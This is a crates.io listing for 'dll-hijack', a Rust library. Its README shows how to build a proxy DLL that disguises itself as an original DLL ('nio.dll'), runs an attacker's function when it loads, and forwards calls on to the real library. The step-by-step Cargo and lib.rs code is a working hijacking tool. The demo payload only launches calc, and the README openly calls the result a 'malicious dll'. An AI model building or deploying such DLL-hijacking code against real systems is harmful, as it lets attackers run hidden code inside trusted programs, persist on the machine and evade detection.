Crates.io | dll-hijack |
lib.rs | dll-hijack |
version | 1.0.1 |
source | src |
created_at | 2023-06-30 07:49:55.054435 |
updated_at | 2023-07-03 09:46:40.162234 |
description | Dll hijack -- just one macro |
homepage | https://twitter.com/b1nhack |
repository | https://github.com/b1-team/dll-hijack |
max_upload_size | |
id | 904234 |
size | 7,250 |
Dll hijack -- just one macro
Create a lib project
cargo new demo --lib
Modify Cargo.toml
[package]
name = "demo"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[lib]
crate-type = ["cdylib"]
[dependencies]
dll-hijack = "1.0.0"
Modify lib.rs
Write a function that will be executed when the dll is loaded
use std::process;
fn test() {
process::Command::new("calc").spawn().unwrap();
}
Set the original dll name and evil dll name using macros
use std::process;
use dll_hijack::hijack;
#[hijack("nio.dll", "nio.dll.1")]
fn test() {
process::Command::new("calc").spawn().unwrap();
}
The malicious dll will be disguised as the original dll, and the malicious dll will execute the malicious function first when loaded.
Then the request for the malicious dll will be forwarded to the original dll.